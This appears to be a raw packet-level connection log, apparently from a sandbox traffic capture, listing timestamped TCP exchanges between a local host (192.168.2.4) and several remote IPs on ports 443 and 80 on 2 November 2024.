                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.260684013 CET4436385813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.299355984 CET44363854188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.299436092 CET44363854188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.299495935 CET63854443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.300833941 CET63854443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.300864935 CET44363854188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.300894976 CET63854443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.300913095 CET44363854188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.309251070 CET8063856185.215.113.43192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.309413910 CET6385680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.318489075 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.319303036 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.324099064 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.324249983 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.324353933 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.324453115 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.328082085 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.333129883 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.378114939 CET4436385713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.378261089 CET4436385713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.382224083 CET63857443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.382311106 CET63857443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.382311106 CET63857443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.382327080 CET4436385713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.382335901 CET4436385713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.384493113 CET63863443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.384531021 CET4436386313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.384824991 CET63863443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.385221958 CET63863443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.385235071 CET4436386313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.387062073 CET4436386013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.387120962 CET4436386013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.389940977 CET4436385913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.389986992 CET4436385913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.390055895 CET63859443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.390070915 CET63860443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.390162945 CET63860443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.390201092 CET4436386013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.390238047 CET63860443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.390254021 CET4436386013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.393325090 CET4436385813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.393491983 CET4436385813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.393533945 CET4436385813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.393666983 CET63858443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.393727064 CET63858443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.393734932 CET4436385813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.415865898 CET63859443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.415887117 CET4436385913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.419708014 CET63864443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.419734955 CET4436386413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.419786930 CET63864443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.420386076 CET63864443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.420399904 CET4436386413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.421518087 CET63865443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.421561003 CET4436386513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.421621084 CET63865443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.421746969 CET63865443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.421768904 CET4436386513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.422483921 CET63866443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.422498941 CET4436386613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.422550917 CET63866443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.423080921 CET63866443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.423094034 CET4436386613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.451178074 CET63867443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.451203108 CET44363867188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.451260090 CET63867443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.451679945 CET63867443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.451693058 CET44363867188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.937604904 CET4436386113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.979830027 CET63861443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.017806053 CET63861443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.017824888 CET4436386113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.022703886 CET63861443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.022723913 CET4436386113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.066164970 CET44363867188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.066251040 CET63867443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.121176958 CET4436386313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.152688980 CET4436386113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.152831078 CET4436386113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.152889013 CET63861443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.158526897 CET4436386513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.158674002 CET4436386413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.167316914 CET63863443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.179107904 CET4436386613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.198560953 CET63865443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.214169979 CET63864443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.229809999 CET63866443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270492077 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270546913 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270561934 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270569086 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270580053 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270595074 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270608902 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270608902 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270612001 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270626068 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270636082 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270641088 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270658016 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270674944 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270683050 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270699978 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270729065 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.271401882 CET63867443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.271421909 CET44363867188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.271624088 CET44363867188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.275567055 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.275630951 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.275749922 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.275765896 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.275790930 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.275810003 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.275873899 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.275913000 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.286535025 CET63867443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.286560059 CET63867443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.286601067 CET44363867188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.306780100 CET63866443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.306791067 CET4436386613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.307184935 CET63866443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.307188988 CET4436386613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.307370901 CET63864443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.307374954 CET4436386413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.307683945 CET63864443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.307687998 CET4436386413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.307826042 CET63863443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.307837963 CET4436386313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.308610916 CET63863443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.308615923 CET4436386313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.308779955 CET63861443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.308795929 CET4436386113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.308805943 CET63861443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.308810949 CET4436386113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.364366055 CET63865443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.364424944 CET4436386513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.365021944 CET63865443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.365037918 CET4436386513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.428988934 CET63868443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.429065943 CET4436386813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.429141045 CET63868443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.429260969 CET63868443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.429291964 CET4436386813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.433738947 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.433759928 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.433792114 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.433813095 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.433824062 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.433883905 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.433893919 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.433923006 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.433994055 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.434247017 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.434259892 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.434271097 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.434282064 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.434294939 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.434298038 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.434315920 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.434349060 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.434537888 CET4436386313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.434600115 CET4436386313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.434667110 CET63863443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.434676886 CET4436386313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.434730053 CET4436386313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.434777975 CET63863443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.434797049 CET63863443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.434804916 CET4436386313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.434818983 CET63863443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.434823036 CET4436386313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.435543060 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.435555935 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.435564995 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.435580015 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.435590982 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.435602903 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.435605049 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.435619116 CET4436386413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.435653925 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.435702085 CET4436386413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.435772896 CET63864443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.435899973 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.435921907 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.435925961 CET63864443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.435935020 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.435940027 CET4436386413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.435949087 CET63864443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.435947895 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.435952902 CET4436386413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.435990095 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.435990095 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.435996056 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.436007977 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.436019897 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.436048985 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.436078072 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.436835051 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.436934948 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.437001944 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.437658072 CET4436386613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.437681913 CET4436386613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.437714100 CET4436386613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.437727928 CET63866443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.437757015 CET63866443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.438606977 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.438651085 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.444953918 CET63869443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.445009947 CET4436386913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.445095062 CET63869443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.445235968 CET63869443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.445247889 CET63866443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.445261002 CET4436386613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.445266962 CET4436386913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.448174000 CET63870443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.448215008 CET4436387013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.448280096 CET63870443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.476303101 CET63870443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.476337910 CET4436387013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.477740049 CET63871443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.477776051 CET4436387113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.477843046 CET63871443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.477979898 CET63871443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.477998972 CET4436387113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.491014004 CET4436386513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.491080046 CET4436386513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.491156101 CET63865443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.491465092 CET63865443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.491497040 CET4436386513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.491522074 CET63865443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.491554976 CET4436386513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.498147011 CET63872443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.498169899 CET4436387213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.498229980 CET63872443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.498369932 CET63872443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.498383045 CET4436387213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597019911 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597079039 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597147942 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597160101 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597171068 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597182035 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597199917 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597229004 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597274065 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597331047 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597415924 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597426891 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597440004 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597450972 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597462893 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597472906 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597480059 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597484112 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597496033 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597506046 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597507000 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597507000 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597517014 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597526073 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597529888 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597543955 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597543955 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597567081 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597615004 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.597989082 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.598000050 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.598010063 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.598040104 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.598067999 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.598123074 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.598139048 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.598151922 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.598167896 CET6386280192.168.2.4185.215.113.16
